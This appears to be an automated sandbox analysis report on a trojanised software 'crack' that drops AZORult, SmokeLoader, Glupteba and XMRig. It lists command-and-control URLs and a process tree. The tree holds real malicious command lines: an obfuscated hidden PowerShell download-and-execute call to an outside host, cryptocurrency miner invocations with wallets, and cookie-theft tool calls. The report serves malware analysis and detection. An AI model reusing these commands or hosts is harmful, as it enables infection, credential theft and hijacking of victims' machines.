Analysis
-
max time kernel
55s -
max time network
304s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 07:46
Static task
static1
Behavioral task
behavioral1
Sample
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
Resource
win10v20201028
General
-
Target
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
-
Size
5.4MB
-
MD5
baad366f257529076340afc66d1ac59c
-
SHA1
3dafcc431b85bd6a527e70879137e1f27e160849
-
SHA256
3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975
-
SHA512
98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/188-215-0x0000000002590000-0x0000000002E9A000-memory.dmp family_glupteba behavioral2/memory/188-216-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/188-217-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/220-180-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/220-176-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/220-199-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/220-238-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 9 IoCs
pid Process 3048 keygen-pr.exe 528 keygen-step-1.exe 832 keygen-step-3.exe 312 keygen-step-4.exe 4368 key.exe 1736 Setup.exe 2312 key.exe 4504 multitimer.exe 2644 setups.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 260 ipinfo.io 75 api.ipify.org 104 ipinfo.io 109 ipinfo.io 153 ip-api.com 186 api.ipify.org 244 ip-api.com 257 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4368 set thread context of 2312 4368 key.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
pid pid_target Process procid_target 7208 436 WerFault.exe 163 6300 436 WerFault.exe 163 5168 436 WerFault.exe 163 6868 436 WerFault.exe 163 6388 436 WerFault.exe 163 7976 436 WerFault.exe 163 7468 436 WerFault.exe 163 8076 436 WerFault.exe 163 6592 436 WerFault.exe 163 3128 436 WerFault.exe 163 6392 436 WerFault.exe 163 7600 436 WerFault.exe 163 3944 436 WerFault.exe 163 -
Delays execution with timeout.exe 1 IoCs
pid Process 2196 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 804 taskkill.exe 4344 taskkill.exe 6636 taskkill.exe 7832 taskkill.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2712 PING.EXE 6116 PING.EXE 5612 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 105 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 121 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 258 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 266 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1736 Setup.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2644 setups.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 4640 wrote to memory of 3176 4640 Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe 78 PID 4640 wrote to memory of 3176 4640 Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe 78 PID 4640 wrote to memory of 3176 4640 Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe 78 PID 3176 wrote to memory of 3048 3176 cmd.exe 81 PID 3176 wrote to memory of 3048 3176 cmd.exe 81 PID 3176 wrote to memory of 3048 3176 cmd.exe 81 PID 3176 wrote to memory of 528 3176 cmd.exe 82 PID 3176 wrote to memory of 528 3176 cmd.exe 82 PID 3176 wrote to memory of 528 3176 cmd.exe 82 PID 3176 wrote to memory of 832 3176 cmd.exe 83 PID 3176 wrote to memory of 832 3176 cmd.exe 83 PID 3176 wrote to memory of 832 3176 cmd.exe 83 PID 3176 wrote to memory of 312 3176 cmd.exe 84 PID 3176 wrote to memory of 312 3176 cmd.exe 84 PID 3176 wrote to memory of 312 3176 cmd.exe 84 PID 3048 wrote to memory of 4368 3048 keygen-pr.exe 85 PID 3048 wrote to memory of 4368 3048 keygen-pr.exe 85 PID 3048 wrote to memory of 4368 3048 keygen-pr.exe 85 PID 312 wrote to memory of 1736 312 keygen-step-4.exe 86 PID 312 wrote to memory of 1736 312 keygen-step-4.exe 86 PID 832 wrote to memory of 4424 832 keygen-step-3.exe 87 PID 832 wrote to memory of 4424 832 keygen-step-3.exe 87 PID 832 wrote to memory of 4424 832 keygen-step-3.exe 87 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4368 wrote to memory of 2312 4368 key.exe 89 PID 4424 wrote to memory of 2712 4424 cmd.exe 91 PID 4424 wrote to memory of 2712 4424 cmd.exe 91 PID 4424 wrote to memory of 2712 4424 cmd.exe 91 PID 1736 wrote to memory of 4504 1736 Setup.exe 92 PID 1736 wrote to memory of 4504 1736 Setup.exe 92 PID 1736 wrote to memory of 2644 1736 Setup.exe 93 PID 1736 wrote to memory of 2644 1736 Setup.exe 93 PID 1736 wrote to memory of 2644 1736 Setup.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe"C:\Users\Admin\AppData\Local\Temp\Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:2312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:528
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:312 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\4QAPQ1KG6N\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4QAPQ1KG6N\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\4QAPQ1KG6N\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4QAPQ1KG6N\multitimer.exe" 1 3.1617436125.60681dddb80c9 1016⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\4QAPQ1KG6N\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4QAPQ1KG6N\multitimer.exe" 2 3.1617436125.60681dddb80c97⤵PID:4304
-
C:\Users\Admin\AppData\Local\Temp\hje4niff3ly\vict.exe"C:\Users\Admin\AppData\Local\Temp\hje4niff3ly\vict.exe" /VERYSILENT /id=5358⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\is-SM62U.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-SM62U.tmp\vict.tmp" /SL5="$102A6,870426,780800,C:\Users\Admin\AppData\Local\Temp\hje4niff3ly\vict.exe" /VERYSILENT /id=5359⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\is-0S8O9.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-0S8O9.tmp\win1host.exe" 53510⤵PID:4364
-
C:\Users\Admin\AppData\Local\Temp\faVhzWMDa.exe"C:\Users\Admin\AppData\Local\Temp\faVhzWMDa.exe"11⤵PID:4128
-
C:\Users\Admin\AppData\Local\Temp\faVhzWMDa.exe"C:\Users\Admin\AppData\Local\Temp\faVhzWMDa.exe"12⤵PID:928
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tzanzggbpel\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\tzanzggbpel\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\is-EGHOG.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-EGHOG.tmp\IBInstaller_97039.tmp" /SL5="$102F6,14574851,721408,C:\Users\Admin\AppData\Local\Temp\tzanzggbpel\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5416
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-4O9OI.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5640
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-4O9OI.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5800
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\axn02fcd1is\vpn.exe"C:\Users\Admin\AppData\Local\Temp\axn02fcd1is\vpn.exe" /silent /subid=4828⤵PID:4616
-
C:\Users\Admin\AppData\Local\Temp\is-SOKP1.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOKP1.tmp\vpn.tmp" /SL5="$20202,15170975,270336,C:\Users\Admin\AppData\Local\Temp\axn02fcd1is\vpn.exe" /silent /subid=4829⤵PID:5288
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:1572
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5916
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:992
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:6880
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:6576
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1sf4mwzxvxz\app.exe"C:\Users\Admin\AppData\Local\Temp\1sf4mwzxvxz\app.exe" /8-238⤵PID:188
-
C:\Users\Admin\AppData\Local\Temp\1sf4mwzxvxz\app.exe"C:\Users\Admin\AppData\Local\Temp\1sf4mwzxvxz\app.exe" /8-239⤵PID:7664
-
-
-
C:\Users\Admin\AppData\Local\Temp\cwoy2occlwc\anl0dpsxiqv.exe"C:\Users\Admin\AppData\Local\Temp\cwoy2occlwc\anl0dpsxiqv.exe"8⤵PID:1568
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\cwoy2occlwc\anl0dpsxiqv.exe"9⤵PID:5924
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:6116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbicpvvujeb\h0cxqfvv5wl.exe"C:\Users\Admin\AppData\Local\Temp\hbicpvvujeb\h0cxqfvv5wl.exe" /VERYSILENT8⤵PID:3304
-
C:\Users\Admin\AppData\Local\Temp\is-EKB2P.tmp\h0cxqfvv5wl.tmp"C:\Users\Admin\AppData\Local\Temp\is-EKB2P.tmp\h0cxqfvv5wl.tmp" /SL5="$20204,2592217,780800,C:\Users\Admin\AppData\Local\Temp\hbicpvvujeb\h0cxqfvv5wl.exe" /VERYSILENT9⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\is-S5M8B.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-S5M8B.tmp\winlthsth.exe"10⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\jJqo1GEnd.exe"C:\Users\Admin\AppData\Local\Temp\jJqo1GEnd.exe"11⤵PID:440
-
C:\Users\Admin\AppData\Local\Temp\jJqo1GEnd.exe"C:\Users\Admin\AppData\Local\Temp\jJqo1GEnd.exe"12⤵PID:2148
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:7012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:5540
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4jdwg2zsmmr\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\4jdwg2zsmmr\KiffApp1.exe"8⤵PID:4600
-
-
C:\Users\Admin\AppData\Local\Temp\kqf00tqekt2\234smakstbl.exe"C:\Users\Admin\AppData\Local\Temp\kqf00tqekt2\234smakstbl.exe" /quiet SILENT=1 AF=7568⤵PID:5332
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\kqf00tqekt2\234smakstbl.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\kqf00tqekt2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617176569 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:676
-
-
-
C:\Users\Admin\AppData\Local\Temp\r5z2xl5trcs\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\r5z2xl5trcs\Setup3310.exe" /Verysilent /subid=5778⤵PID:3096
-
-
C:\Users\Admin\AppData\Local\Temp\z2fj1g0wzvt\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\z2fj1g0wzvt\cpyrix.exe" /VERYSILENT8⤵PID:3076
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5188
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:5808
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:1828
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:5928
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:3104
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3ky2cx40lml\5wdm5rzve3n.exe"C:\Users\Admin\AppData\Local\Temp\3ky2cx40lml\5wdm5rzve3n.exe" /ustwo INSTALL8⤵PID:2192
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "5wdm5rzve3n.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3ky2cx40lml\5wdm5rzve3n.exe" & exit9⤵PID:5952
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5wdm5rzve3n.exe" /f10⤵
- Kills process with taskkill
PID:4344
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\setups.exe"C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\is-SRTVC.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-SRTVC.tmp\setups.tmp" /SL5="$401CE,635399,250368,C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\setups.exe" ll6⤵PID:2476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵PID:4580
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4108
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:1724
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4052
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:2540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4172
-
C:\Users\Admin\AppData\Roaming\4DE2.tmp.exe"C:\Users\Admin\AppData\Roaming\4DE2.tmp.exe"5⤵PID:1864
-
C:\Users\Admin\AppData\Roaming\4DE2.tmp.exe"C:\Users\Admin\AppData\Roaming\4DE2.tmp.exe"6⤵PID:4576
-
-
-
C:\Users\Admin\AppData\Roaming\5064.tmp.exe"C:\Users\Admin\AppData\Roaming\5064.tmp.exe"5⤵PID:4344
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:204
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:220
-
-
-
C:\Users\Admin\AppData\Roaming\51FB.tmp.exe"C:\Users\Admin\AppData\Roaming\51FB.tmp.exe"5⤵PID:4396
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\51FB.tmp.exe6⤵PID:5356
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:2196
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:6056
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5612
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:4508
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:4420
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:6620
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7304
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6756
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3708
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2560
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4020
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\is-0UBJM.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-0UBJM.tmp\Setup3310.tmp" /SL5="$2020A,138429,56832,C:\Users\Admin\AppData\Local\Temp\r5z2xl5trcs\Setup3310.exe" /Verysilent /subid=5771⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\is-5DH5C.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5DH5C.tmp\Setup.exe" /Verysilent2⤵PID:4892
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:3788
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6012
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5560
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 9044⤵
- Program crash
PID:7208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 10044⤵
- Program crash
PID:6300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 10164⤵
- Program crash
PID:5168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 11564⤵
- Program crash
PID:6868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 11884⤵
- Program crash
PID:6388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 12524⤵
- Program crash
PID:7976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 15364⤵
- Program crash
PID:7468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 15124⤵
- Program crash
PID:8076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 17884⤵
- Program crash
PID:6592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 17564⤵
- Program crash
PID:3128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 18604⤵
- Program crash
PID:6392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 17844⤵
- Program crash
PID:7600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 17244⤵
- Program crash
PID:3944
-
-
-
